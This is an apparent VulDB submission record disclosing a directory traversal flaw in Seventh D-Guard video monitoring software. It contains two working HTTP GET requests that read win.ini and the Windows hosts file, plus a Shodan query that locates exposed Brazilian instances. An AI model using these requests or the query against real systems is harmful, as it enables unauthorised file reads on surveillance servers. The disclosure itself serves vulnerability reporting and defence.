| タイトル | Seventh D-Guard NA Path Traversal |
|---|
| 説明 | URL Vendor: https://www.seventh.com.br/
Product:
https://www.seventh.com.br/solucoes/projetos-de-monitoramento/videomonitoramento
https://www.seventh.com.br/suporte/dispositivos-integrados/dguard
Directory Traversal is a vulnerability which allows attackers to access restricted directories and read files outside of the web server's root directory.
GET /../../../../../../../../windows/win.ini HTTP/1.1
Host: x.x.x.x:8081
Cookie: SessaoId=ZZIOVeZ5wHOgBm17gGXe
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Connection: Keep-alive
Readind /etc/hosts
GET /../../../../../../../../Windows/System32/Drivers/Etc/hosts HTTP/1.1
Host: x.x.x.x:8081
Cookie: SessaoId=ZZIOVeZ5wHOgBm17gGXe
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Connection: Keep-alive
Shodan Query:
https://www.shodan.io/search?query=Title%3A%22Web%22+Content-Length%3A+21928+country%3A%22BR%22+Content-Type%3A+text%2Fhtml%3B+charset%3DISO-8859-1&page=3
|
|---|
| ユーザー | c4ng4c3ir0 (UID 38456) |
|---|
| 送信 | 2025年02月06日 18:29 (1 年 ago) |
|---|
| モデレーション | 2025年02月15日 16:31 (9 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 295965 [Seventh D-Guard 迄 20250206 HTTP GET Request ディレクトリトラバーサル] |
|---|
| ポイント | 17 |
|---|